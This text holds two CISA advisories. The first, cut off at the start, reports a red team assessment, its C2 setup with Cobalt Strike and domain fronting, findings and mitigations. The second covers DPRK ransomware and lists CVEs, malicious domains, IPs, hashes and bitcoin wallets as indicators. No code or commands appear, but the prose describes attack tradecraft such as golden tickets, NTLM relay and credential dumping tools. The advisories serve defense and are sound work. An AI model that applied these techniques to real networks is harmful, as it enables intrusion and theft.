- The team maintained multiple Cobalt Strike servers hosted by a cloud vendor. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data.
Two commercially available cloud-computing platforms.
- The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team’s Cobalt Strike servers [T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors used HTTPS reverse proxies to redirect C2 traffic between the target organization’s network and the Cobalt Strike team servers [T1071.002]. The team encrypted all data in transit [T1573] using encryption keys stored on team’s Cobalt Strike servers.
A cloud service to rapidly change the IP address of the team’s redirecting servers in the event of detection and eradication.
Content delivery network (CDN) services to further obfuscate some of the team’s C2 traffic.
- This technique leverages CDNs associated with high-reputation domains so that the malicious traffic appears to be directed towards a reputation domain but is actually redirected to the red team-controlled Cobalt Strike servers.
- The team used domain fronting [T1090.004] to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating. This technique, which also leverages CDNs, allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team’s redirect server.

Phase II: Red Team Measurable Events Activity

The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. See Table 1 for a description of the events, the expected network defender activity, and the organization’s actual response.

*Table 1: Measurable Events*
Measurable Event	Description	MITRE ATT&CK Technique(s)	Expected Detection Points	Expected Network Defender Reactions	Reported Reactions
Internal Port Scan	Launch scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s).	Network Service Discovery [T1046]	Network Monitoring and Analysis Tools Intrusion Detection or Prevention Systems Endpoint Protection Platform	Detect target hosts and ports Identify associated scanning process Analyze scanning host once detected Develop response plan	None
Comprehensive Active Directory and Host Enumeration	Perform AD enumeration by querying all domain objects from the DC; and enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer (Workstation and Server).	Domain Trust Discovery [T1482] Account Discovery: Domain Account [T1087.002] System Owner/User Discovery [T1033] Remote System Discovery [T1018]	Network Monitoring and Analysis Tools Intrusion Detection or Prevention Systems Endpoint Protection Platform	Detect target hosts and ports Identify associated scanning process Analyze scanning host once detected Develop response plan	Collection process stopped before completion. Host isolated and sent for forensics.
Data Exfiltration—1 GB of Data	Send a large amount (1 GB) of mock sensitive information to an external system over various protocols, including ICMP, DNS, FTP, and/or HTTP/S.	Exfiltration Over Alternative Protocol [T1048]	Network Monitoring and Analysis Tools Intrusion Detection or Prevention Systems Endpoint Protection Platform	Detect target hosts and ports Identify associated scanning process Analyze scanning host once detected Develop response plan	None
Malicious Traffic Generation—Workstation to External Host	Establish a session that originates from a target Workstation system directly to an external host over a clear text protocol, such as HTTP.	Application Layer Protocol [T1071]	Intrusion Detection or Prevention Systems Endpoint Protection Platform Windows Event Logs	Detect and Identify source IP and source process of enumeration Analyze scanning host once detected Develop response plan	None
Active Directory Account Lockout	Lock out several administrative AD accounts	Account Access Removal [T1531]	Windows Event Logs End User Reporting	Detect and Identify source IP and source process of exfiltration Analyze host used for exfiltration once detected Develop response plan	None
Local Admin User Account Creation (workstation)	Create a local administrator account on a target workstation system.	Create Account: Local Account [T1136.001] Account Manipulation [T1098]	Intrusion Detection or Prevention Systems Endpoint Protection Platform Web Proxy Logs	Detect and identify source IP and source process of malicious traffic Investigate destination IP address Triage compromised host Develop response plan	None
Local Admin User Account Creation (server)	Create a local administrator account on a target server system.	Create Account: Local Account [T1136.001] Account Manipulation [T1098]	Windows Event Logs	Detect account creation Identify source of change Verify change with system owner Develop response plan	None
Active Directory Account Creation	Create AD accounts and add it to domain admins group	Create Account: Domain Account [T1136.002] Account Manipulation [T1098]	Windows Event Logs	Detect account creation Identify source of change Verify change with system owner Develop response plan	None
Workstation Admin Lateral Movement—Workstation to Workstation	Use a previously compromised workstation admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on several target Workstations.	Valid Accounts: Domain Accounts [T1078.002] Remote Services: SMB/Windows Admin Shares, Sub-technique [T1021.002] Create or Modify System Process: Windows Service [T1543.003]	Windows Event Logs	Detect account compromise Analyze compromised host Develop response plan	None
Domain Admin Lateral Movement—Workstation to Domain Controller	Use a previously compromised domain admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on a target DC.	Valid Accounts: Domain Accounts [T1078.002] Remote Services: SMB/Windows Admin Shares, Sub-technique [T1021.002] Create or Modify System Process: Windows Service [T1543.003]	Windows Event Logs	Detect account compromise Triage compromised host Develop response plan	None
Malicious Traffic Generation—Domain Controller to External Host	Establish a session that originates from a target Domain Controller system directly to an external host over a clear text protocol, such as HTTP.	Application Layer Protocol [T1071]	Intrusion Detection or Prevention Systems Endpoint Protection Platform Web Proxy Logs	Detect and identify source IP and source process of malicious traffic Investigate destination IP address Triage compromised host Develop response plan	None
Trigger Host-Based Protection—Domain Controller	Upload and execute a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts.	Ingress Tool Transfer [T1105]	Endpoint Protection Platform Endpoint Detection and Response	Detect and identify source IP and source process of malicious traffic Investigate destination IP address Triage compromised host Develop response plan	Malicious file was removed by antivirus
Ransomware Simulation	Execute simulated ransomware on multiple Workstation systems to simulate a ransomware attack. Note: This technique does NOT encrypt files on the target system.	N/A	End User Reporting	Investigate end user reported event Triage compromised host Develop response Plan	Four users reported event to defensive staff

Findings

Key Issues

The red team noted the following key issues relevant to the security of the organization’s network. These findings contributed to the team’s ability to gain persistent, undetected access across the organization’s sites. See the Mitigations section for recommendations on how to mitigate these issues.

Insufficient host and network monitoring. Most of the red team’s Phase II actions failed to provoke a response from the people, processes, and technology defending the organization’s network. The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs. Additionally, throughout Phase I, the team received no deconflictions or confirmation that the organization caught their activity. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection:
- Phishing
- Lateral movement reuse
- Generation and use of the golden ticket
- Anomalous LDAP traffic
- Anomalous internal share enumeration
- Unconstrained Delegation server compromise
- DCSync
- Anomalous account usage during lateral movement
- Anomalous outbound network traffic
- Anomalous outbound SSH connections to the team’s cloud servers from workstations
Lack of monitoring on endpoint management systems. The team used the organization’s MDM system to gain root access to machines across the organization’s network without being detected. Endpoint management systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
KRBTGT never changed. The Site 1 krbtgt account password had not been updated for over a decade. The krbtgt account is a domain default account that acts as a service account for the key distribution center (KDC) service used to encrypt and sign all Kerberos tickets for the domain. Compromise of the krbtgt account could provide adversaries with the ability to sign their own TGTs, facilitating domain access years after the date of compromise. The red team was able to use the krbtgt account to forge TGTs for multiple accounts throughout Phase I.
Excessive permissions to standard users. The team discovered several standard user accounts that have local administrator access to critical servers. This misconfiguration allowed the team to use the low-level access of a phished user to move laterally to an Unconstrained Delegation host and compromise the entire domain.
Hosts with Unconstrained Delegation enabled unnecessarily. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of all users that authenticate to that host, enabling actors to steal service tickets or compromise krbtgt accounts and perform golden ticket or “silver ticket” attacks. The team performed an NTLM-relay attack to obtain the DC’s TGT, followed by a golden ticket attack on a SharePoint server with Unconstrained Delegation to gain the ability to impersonate any Site 1 AD account.
Use of non-secure default configurations. The organization used default configurations for hosts with Windows Server 2012 R2. The default configuration allows unprivileged users to query group membership of local administrator groups. The red team used and identified several standard user accounts with administrative access from a Windows Server 2012 R2 SharePoint server.

Additional Issues

The team noted the following additional issues.

Ineffective separation of privileged accounts. Some workstations allowed unprivileged accounts to have local administrator access; for example, the red team discovered an ordinary user account in the local admin group for the SharePoint server. If a user with administrative access is compromised, an actor can access servers without needing to elevate privileges. Administrative and user accounts should be separated, and designated admin accounts should be exclusively used for admin purposes.
Lack of server egress control. Most servers, including domain controllers, allowed unrestricted egress traffic to the internet.
Inconsistent host configuration. The team observed inconsistencies on servers and workstations within the domain, including inconsistent membership in the local administrator group among different servers or workstations. For example, some workstations had “Server Admins” or “Domain Admins” as local administrators, and other workstations had neither.
Potentially unwanted programs. The team noticed potentially unusual software, including music software, installed on both workstations and servers. These extraneous software installations indicate inconsistent host configuration (see above) and increase the attack surfaces for malicious actors to gain initial access or escalate privileges once in the network.
Mandatory password changes enabled. During the assessment, the team keylogged a user during a mandatory password change and noticed that only the final character of their password was modified. This is potentially due to domain passwords being required to be changed every 60 days.
Smart card use was inconsistent across the domain. While the technology was deployed, it was not applied uniformly, and there was a significant portion of users without smartcard protections enabled. The team used these unprotected accounts throughout their assessment to move laterally through the domain and gain persistence.

Noted Strengths

The red team noted the following technical controls or defensive measures that prevented or hampered offensive actions:

The organization conducts regular, proactive penetration tests and adversarial assessments and invests in hardening their network based on findings.
- The team was unable to discover any easily exploitable services, ports, or web interfaces from more than three million external in-scope IPs. This forced the team to resort to phishing to gain initial access to the environment.
- Service account passwords were strong. The team was unable to crack any of the hashes obtained from the 610 service accounts pulled. This is a critical strength because it slowed the team from moving around the network in the initial parts of the Phase I.
- The team did not discover any useful credentials on open file shares or file servers. This slowed the progress of the team from moving around the network.
MFA was used for some SBSs. The team was blocked from moving to SBS 2 by an MFA prompt.
There were strong security controls and segmentation for SBS systems. Direct access to SBS were located in separate networks, and admins of SBS used workstations protected by local firewalls.

MITIGATIONS

CISA recommends organizations implement the recommendations in Table 2 to mitigate the issues listed in the Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

*Table 2: Recommendations to Mitigate Identified Issues*
Issue	Recommendation
Insufficient host and network monitoring	Establish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior [CPG 3.1]. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques. Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report. From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts. Consider who is accessing what (what resource), from where (what internal host or external location), and when (what day and time the access occurs). Look for access behavior that deviates from expected or is indicative of AD abuse. Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PSExec, and WMI, which are often used by malicious actors. CISA recommends selecting one tool to administer the network, ensuring logging is turned on [CPG 3.1], and disabling the others. Consider using “honeypot” service principal names (SPNs) to detect attempts to crack account hashes [CPG 1.1]. Conduct regular assessments to ensure processes and procedures are up to date and can be followed by security staff and end users. Consider using red team tools, such as SharpHound, for AD enumeration to identify users with excessive privileges and misconfigured hosts (e.g., with `Unconstrained Delegation` enabled). Ensure all commercial tools deployed in your environment are regularly tuned to pick up on relevant activity in your environment.
Lack of monitoring on endpoint management systems	Treat endpoint management systems as HVAs with additional restrictions and monitoring because they provide elevated access to thousands of hosts.
KRBTGT never changed	Change the `krbtgt` account password on a regular schedule such as every 6 to 12 months or if it becomes compromised. Note that this password change must be carefully performed to effectively change the credential without breaking AD functionality. The password must be changed twice to effectively invalidate the old credentials. However, the required waiting period between resets must be greater than the maximum lifetime period of Kerberos tickets, which is 10 hours by default. See Microsoft’s KRBTGT account maintenance considerations guidance for more information.
Excessive permissions to standard users and ineffective separation of privileged accounts	Implement the principle of least privilege: Grant standard user rights for standard user tasks such as email, web browsing, and using line-of-business (LOB) applications. Periodically audit standard accounts and minimize where they have privileged access. Periodically Audit AD permissions to ensure users do not have excessive permissions and have not been added to admin groups. Evaluate which administrative groups should administer which servers/workstations. Ensure group members administrative accounts instead of standard accounts. Separate administrator accounts from user accounts [CPG 1.5]. Only allow designated admin accounts to be used for admin purposes. If an individual user needs administrative rights over their workstation, use a separate account that does not have administrative access to other hosts, such as servers. Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources [CPG 3.4]. PAM solutions can also log and alert usage to detect any unusual activity and may have helped stop the red team from accessing resources with admin accounts. Note: password vaults associated with PAM solutions should be treated as HVAs with additional restrictions and monitoring (see below). Configure time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege, as well as the Zero Trust model. This is a process in which a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When individual users need the account, they submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.
Hosts with `Unconstrained Delegation` enabled	Remove `Unconstrained Delegation` from all servers. If `Unconstrained Delegation` functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., `constrained delegation`) or explore whether systems can be retired or further isolated from the enterprise. CISA recommends Windows Server 2019 or greater. Consider disabling or limiting NTLM and WDigest Authentication if possible, including using their use as criteria for prioritizing updates to legacy systems or for segmenting the network. Instead use more modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 bit encryption [CPG 3.4]. If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent some NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks CPG 3.4]. See Microsoft Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Microsoft Overview of Server Message Block signing for more information.
Use of non-secure default configurations	Keep systems and software up to date [CPG 5.1]. If updates cannot be uniformly installed, update insecure configurations to meet updated standards.
Lack of server egress control	Configure internal firewalls and proxies to restrict internet traffic from hosts that do not require it. If a host requires specific outbound traffic, consider creating an allowlist policy of domains.
Large number of credentials in a shared vault	Treat password vaults as HVAs with additional restrictions and monitoring [CPG 3.4]: If on-premise, require MFA for admin and apply network segmentation [CPG 1.3]. Use solutions with end-to-end encryption where applicable [CPG 3.3]. If cloud-based, evaluate the provider to ensure use of strong security controls such as MFA and end-to-end encryption [CPG 1.3, 3.3].
Inconsistent host configuration	Establish a baseline/gold-image for workstations and servers and deploy from that image [CPG 2.5]. Use standardized groups to administer hosts in the network.
Potentially unwanted programs	Implement software allowlisting to ensure users can only install software from an approved list [CPG 2.1]. Remove unnecessary, extraneous software from servers and workstations.
Mandatory password changes enabled	Consider only requiring changes for memorized passwords in the event of compromise. Regular changing of memorized passwords can lead to predictable patterns, and both CISA and the National Institute of Standards and Technology (NIST) recommend against changing passwords on regular intervals.

Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture:

Provide users with regular training and exercises, specifically related to phishing emails [CPG 4.3]. Phishing accounts for majority of initial access intrusion events.
Enforce phishing-resistant MFA to the greatest extent possible [CPG 1.3].
Reduce the risk of credential compromise via the following:
- Place domain admin accounts in the protected users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM.
- Implement Credential Guard for Windows 10 and Server 2016 (Refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
- Refrain from storing plaintext credentials in scripts [CPG 3.4]. The red team discovered a PowerShell script containing plaintext credentials that allowed them to escalate to admin.
Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems.

As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that:

Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, policy enforcement).
Upgrades applications and infrastructure to leverage modern identity management and network access practices.
Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks.
Invests in technology and personnel to achieve these goals.

CISA encourages organizational IT leadership to ask their executive leadership the question: Can the organization accept the business risk of NOT implementing critical security controls such as MFA? Risks of that nature should typically be acknowledged and prioritized at the most senior levels of an organization.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Table 3).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

See CISA’s RedEye tool on CISA’s GitHub page. RedEye is an interactive open-source analytic tool used to visualize and report red team command and control activities. See CISA’s RedEye tool overview video for more information.

REFERENCES
[1] Bleeping Computer: New DFSCoerce NTLM Relay attack allows Windows domain takeover

APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 3 for all referenced red team tactics and techniques in this advisory. Note: activity was from Phase I unless noted.

*Table 3: Red Team ATT&CK Techniques for Enterprise*
	Reconnaissance
Technique Title	ID	Use
Gather Victim Identity Information: Email Addresses	T1589.002	The team found employee email addresses via open-source research.
Gather Victim Identify Information: Employee Names	T1589.003	The team identified employee names via open-source research that could be used to derive email addresses.
Gather Victim Network Information: Network Security Appliances	T1590.006	The team identified the organization’s MDM vendor and leveraged that information to move laterally to SBS-connected assets.
Gather Victim Org Information	T1591	The team conducted open-source research and identified an organizational branch that likely had access to an SBS asset.
Gather Victim Org Information: Determine Physical Locations	T1591.001	The team conducted open-source research to identify the physical locations of upkeep/management staff of selected assets.
Search Open Technical Databases: Scan Databases	T1596.005	The team queried an MDM SQL database to identify target administrators who recently connected with the MDM.
	Resource Development
Technique Title	ID	Use
Acquire Infrastructure	T1583	The team used third-party owned and operated infrastructure throughout their assessment for C2.
Establish Accounts: Email Accounts	T1585.002	The team used commercially available email platforms for their spearphishing activity.
Obtain Capabilities: Tool	T1588.002	The team used the following tools: Cobalt Strike and Merlin payloads for C2. KeeThief to obtain a decryption key from a KeePass database Rubeus and DFSCoerce in an NTLM relay attack
	Initial Access
Technique Title	ID	Use
Phishing: Spearphishing Link	T1566.002	The team sent spearphishing emails with links to a red-team-controlled domain to gain access to the organization’s systems.
	Execution
Technique Title	ID	Use
Native API	T1106	The team created a policy via the MDM API, which downloaded and executed a payload on a workstation.
User Execution	T1204	Users downloaded and executed the team’s initial access payloads after clicking buttons to trigger download and execution.
	Persistence
Technique Title	ID	Use
Account Manipulation	T1098	The team elevated account privileges to administrator and modified the user’s account by adding Create Policy and Delete Policy permissions. During Phase II, the team created local admin accounts and an AD account; they added the created AD account to a domain admins group.
Create Account: Local Account	T1136.001	During Phase II, the team created a local administrator account on a workstation and a server.
Create Account: Domain Account	T1136.002	During Phase II, the team created an AD account.
Create or Modify System Process: Windows Service	T1543.003	During Phase II, the team leveraged compromised workstation and domain admin accounts to execute a payload via Windows Service Creation on target workstations and the DC.
Event Triggered Execution: Windows Management Instrumentation Event Subscription	T1546.003	The team used WMI Event Subscriptions to move laterally between sites.
Hijack Execution Flow: DLL Search Order Hijacking	T1574.001	The team used DLL hijacking to move laterally between sites.
	Privilege Escalation
Technique Title	ID	Use
Abuse Elevation Control Mechanism	T1548	The team elevated user account privileges to administrator by modifying the user’s account via adding Create Policy and Delete Policy permissions.
	Defense Evasion
Technique Title	ID	Use
Valid Accounts: Domain Accounts	T1078.002	During Phase II, the team compromised a domain admin account and used it to laterally to multiple workstations and the DC.
	Credential Access
Technique Title	ID	Use
OS Credential Dumping: LSASS Memory	T1003.001	The team obtained the cached credentials from a SharePoint server account by taking a snapshot of lsass.exe with a tool called nanodump, exporting the output and processing the output offline with Mimikatz.
OS Credential Dumping: DCSync	T1003.006	The team harvested AES-256 hashes via DCSync.
Brute Force: Password Cracking	T1110.002	The team cracked a user’s workstation account password after learning the user’s patterns from plaintext credentials.
Unsecured Credentials	T1552	The team found backups of a MySQL database that contained the encryption key needed to decrypt SSH passwords.
Unsecured Credentials: Credentials in Files	T1552.001	The team found plaintext credentials to an API user account stored in PowerShell scripts on an MDM server.
Unsecured Credentials: Bash History	T1552.003	The team found bash history files on a Workstation 5, and the files appeared to be SSH passwords saved in bash history.
Credentials from Password Stores: Password Managers	T1555.005	The team pulled credentials from a KeePass database.
Adversary-in-the-middle: LLMNR/NBT-NS Poisoning and SMB Relay	T1557.001	The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Steal or Forge Kerberos Tickets: Golden Ticket	T1558.001	The team used the acquired krbtgt account hash throughout their assessment to forge legitimate TGTs.
Steal or Forge Kerberos Tickets: Kerberoasting	T1558.003	The team leveraged Rubeus and DFSCoerce in a NTLM relay attack to obtain the DC’s TGT from a host with Unconstrained Delegation enabled.
	Discovery
Technique Title	ID	Use
System Network Configuration Discovery	T1016	The team queried the AD for information about the network's sites and subnets.
Remote System Discovery	T1018	The team queried the AD, during phase I and II, for information about computers on the network.
System Network Connections Discovery	T1049	The team listed existing network connections on SCCM Server 1 to reveal an active SMB connection with server 2.
Permission Groups Discovery: Domain Groups	T1069.002	The team leveraged ldapsearch and dsquery to query and scrape active directory information.
Account Discovery: Domain Account	T1087.002	The team queried AD for AD users (during Phase I and II), including for members of a SharePoint admin group and several standard user accounts with administrative access.
Cloud Infrastructure Discovery	T1580	The team found SecOps network diagrams on a host detailing cloud infrastructure boundaries.
Domain Trust Discovery	T1482	During Phase II, the team enumerated trust relationships within the AD Forest.
Group Policy Discovery	T1615	The team scraped AD information, including GPOs.
Network Service Discovery	T1046	During Phase II, the team enumerated ports on target systems from a previously compromised workstation.
System Owner/User Discovery	T1033	During Phase II, the team enumerated the AD for current session information from every domain computer (Workstation and Server).
	Lateral Movement
Technique Title	ID	Use
Remote Services: SMB/Windows Admin Shares	T1021.002	The team moved laterally with an SMB beacon. During Phase II, they used compromised workstation and domain admin accounts to upload a payload via SMB on several target Workstations and the DC.
Use Alternate Authentication Material: Pass the Hash	T1550.002	The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Pass the Ticket	T1550.003	The team used the asktgt command to impersonate accounts for which they had credentials by requesting account TGTs.
	Command and Control
Technique Title	ID	Use
Application Layer Protocol	T1071	The team remotely enumerated the local administrators group on target hosts to find valid user accounts. This technique relies on anonymous SMB pipe binds, which are disabled by default starting with Server 2016. During Phase II, the team established sessions that originated from a target Workstation and from the DC directly to an external host over a clear text protocol.
Application Layer Protocol: Web Protocols	T1071.001	The team’s C2 redirectors used HTTPS reverse proxies to redirect C2 traffic.
Application Layer Protocol: File Transfer Protocols	T1071.002	The team used HTTPS reverse proxies to redirect C2 traffic between target network and the team’s Cobalt Strike servers.
Encrypted Channel	T1573	The team’s C2 traffic was encrypted in transit using encryption keys stored on their C2 servers.
Ingress Tool Transfer	T1105	During Phase II, the team uploaded and executed well-known malicious files to the DC to generate host-based alerts.
Proxy: External Proxy	T1090.002	The team used redirectors to redirect C2 traffic between the target organization’s network and the team’s C2 servers.
Proxy: Domain Fronting	T1090.004	The team used domain fronting to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating.
	Impact
Technique Title	ID	Use
Account Access Removal	T1531	During Phase II, the team locked out several administrative AD accounts.

Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.

#StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

CISA — Thu, 16 Feb 2023 15:45:26 EST

SUMMARY

Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn about other ransomware threats and no-cost resources.

The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.

This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. This advisory highlights TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.

The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department of Defense Information Networks and Defense Industrial Base member networks. The IOCs in this product should be useful to sectors previously targeted by DPRK cyber operations (e.g., U.S. government, Department of Defense, and Defense Industrial Base). The authoring agencies highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.

For additional information on state-sponsored DPRK malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.

Download the PDF version of this report: pdf, 661 kb.

For a downloadable copy of IOCs, see

AA23-040A STIX XML (XML, 196.24 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

This CSA is supplementary to previous reports on malicious cyber actor activities involving DPRK ransomware campaigns—namely Maui and H0lyGh0st ransomware. The authoring agencies are issuing this advisory to highlight additional observed TTPs DPRK cyber actors are using to conduct ransomware attacks targeting South Korean and U.S. healthcare systems.

Observable TTPs

The TTPs associated with DPRK ransomware attacks include those traditionally observed in ransomware operations. Additionally, these TTPs span phases from acquiring and purchasing infrastructure to concealing DPRK affiliation:

Acquire Infrastructure [T1583]. DPRK actors generate domains, personas, and accounts; and identify cryptocurrency services to conduct their ransomware operations. Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft.
Obfuscate Identity. DPRK actors purposely obfuscate their involvement by operating with or under third-party foreign affiliate identities and use third-party foreign intermediaries to receive ransom payments.
Purchase VPNs and VPSs [T1583.003]. DPRK cyber actors will also use virtual private networks (VPNs) and virtual private servers (VPSs) or third-country IP addresses to appear to be from innocuous locations instead of from DPRK.
Gain Access [TA0001]. Actors use various exploits of common vulnerabilities and exposures (CVE) to gain access and escalate privileges on networks. Recently observed CVEs that actors used to gain access include remote code execution in the Apache Log4j software library (known as Log4Shell) and remote code execution in unpatched SonicWall SMA 100 appliances [T1190 and T1133]. Observed CVEs used include:
CVE 2021-44228
CVE-2021-20038
CVE-2022-24990

Actors also likely spread malicious code through Trojanized files for “X-Popup,” an open source messenger commonly used by employees of small and medium hospitals in South Korea [T1195].

The actors spread malware by leveraging two domains: xpopup.pe[.]kr and xpopup.com. xpopup.pe[.]kr is registered to IP address 115.68.95[.]128 and xpopup[.]com is registered to IP address 119.205.197[.]111. Related file names and hashes are listed in table 1.

*Table 1: Malicious file names and hashes spread by xpopup domains*
File Name	MD5 Hash
xpopup.rar	1f239db751ce9a374eb9f908c74a31c9
X-PopUp.exe	6fb13b1b4b42bac05a2ba629f04e3d03
X-PopUp.exe	cf8ba073db7f4023af2b13dd75565f3d
xpopup.exe	4e71d52fc39f89204a734b19db1330d3
x-PopUp.exe	43d4994635f72852f719abb604c4a8a1
xpopup.exe	5ae71e8440bf33b46554ce7a7f3de666

Move Laterally and Discovery [TA0007, TA0008]. After initial access, DPRK cyber actors use staged payloads with customized malware to perform reconnaissance activities, upload and download additional files and executables, and execute shell commands [T1083, T1021]. The staged malware is also responsible for collecting victim information and sending it to the remote host controlled by the actors [TA0010].
Employ Various Ransomware Tools [TA0040]. Actors have used privately developed ransomware, such as Maui and H0lyGh0st [T1486]. Actors have also been observed using or possessing publically available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486]. In some cases, DPRK actors have portrayed themselves as other ransomware groups, such as the REvil ransomware group. For IOCs associated with Maui and H0lyGh0st ransomware usage, please see Appendix B.
Demand Ransom in Cryptocurrency. DPRK cyber actors have been observed setting ransoms in bitcoin [T1486].
Actors are known to communicate with victims via Proton Mail email accounts. For private companies in the healthcare sector, actors may threaten to expose a company’s proprietary data to competitors if ransoms are not paid. Bitcoin wallet addresses possibly used by DPRK cyber actors include:
- 1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
- bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
- 1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
- 16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
- bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
- bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
- 1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
- bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
- 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
- 1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
- 16sYqXancDDiijcuruZecCkdBDwDf4vSEC
- 1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
- LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135
- 1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
- 1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
- bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
- bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
- bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
- bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
